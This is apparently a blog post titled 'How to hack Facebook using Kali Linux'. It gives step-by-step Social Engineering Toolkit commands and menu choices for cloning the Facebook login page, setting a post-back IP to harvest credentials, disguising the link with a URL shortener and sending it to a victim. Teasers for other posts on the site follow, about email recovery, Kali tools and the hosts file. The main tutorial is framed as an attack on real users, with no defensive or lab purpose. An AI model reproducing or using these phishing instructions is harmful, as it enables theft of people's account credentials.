Skip to main content

How to hack Facebook using Kali Linux : CREDENTIALS HARVESTER ATTACK.


WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

STEPS:

1. Boot up kali linux on your machine and open terminal.
 
2. Type this command in the kali linux terminal.
                    
                    root@kali~# setoolkit
 
3. Enter 'y' to agree the social engineering toolkit terms and conditions.
 
4. Select the following options one by one from the menu
 
                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then
 
5. Type '2' (Site cloner)
 
          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          
          set:webattack>Enter the url to clone: www.fb.com
 
    
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.
 
7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

Comments

Post a Comment

Popular posts from this blog

These are the precautions you have to take, When your E-MAIL has been Hacked.

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out by suggesting some of the steps that you need to take as soon as you realize that your  email account is hacked . Here is a list of steps and procedures that you need to follow in order to initiate the password recovery process: Steps to Recover Gmail Password: It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try: Step-1:  Try resetting your password! This is the fir...
Post a Comment
Read more

The 20 Most Popular Hacking Tools for "Kali Linux"

Top 20 Most Popular Hacking Tools for "Kali Linux". I n the world of cyber security, there are many tools available on the internet, many of them are free and others are paid. 1.  Aircrack-ng Aircrack-ng.org is an 802.11 WEP and WPA-PSK keys breaking program that can resolve keys once enough information regarding the term stolen. It executes the standard FMS attack alongside a few improvements like KoreK breachand additionally the all-new PTW attack, in this way making the assault much quicker contrasted with other WEP splitting devices. Actually, Aircrack-ng is an arrangement of software for evaluating remote systems. 2.  sqlmap sqlmap is an open source infiltration testing device that robotized the procedure of recognizing and abusing SQL infusion imperfections and assuming control of database servers. Full support for  MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB  data...
Post a Comment
Read more

Block or Redirect Unwanted Websites Using HOSTS File.

The  hosts file  is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the  hosts  file to block  annoying ads, pop-ups, banners, porn sites, or even redirect one website to another. In this post I will show you how to play around with the  hosts  file to accomplish some of the above mentioned jobs. What is a hosts File? The  hosts  file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses. In other words, when you type “google.com” on your browser’s address bar, your computer will look for the  hosts  file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the  hosts  file, the request is then passed on to the DN...
Post a Comment
Read more